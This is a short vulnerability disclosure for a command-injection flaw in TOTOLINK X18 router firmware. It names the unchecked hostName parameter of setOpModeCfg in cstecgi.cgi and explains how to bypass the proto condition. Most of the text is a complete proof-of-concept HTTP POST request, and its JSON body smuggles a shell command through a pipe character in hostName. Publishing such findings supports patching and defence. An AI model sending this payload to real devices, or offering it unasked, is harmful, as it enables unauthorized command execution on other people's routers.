TOTOLINKļ¼X18 V9.1.0cu.2024_B20220329
TOTOLINKļ¼X18 V9.1.0cu.2021_B20220326
https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/226/ids/36.html
The hostName parameter of setOpModeCfg in the cstecgi.cgi is controllable, and there is no verification of the entered hostName parameter, but it can be used only after bypassing the proto condition. Set proto! = 0 4 6 8 to trigger the injection code below.
CsteSystem comes from the/usr/lib/libcscommon.so. Through analysis, you can know that the command will eventually be executed by calling/bin/bash through execv
Poc:
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.109.161
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 61
Origin: <http://192.168.109.161>
Connection: close
Referer: <http://192.168.109.161/basic/mesh.html?timestamp=1667781517612>
Cookie: SESSION_ID=2:1667781512:2
{"hostName": "1'|id\\n","proto":"7","topicurl":"setOpModeCfg"}
Test screenshot:
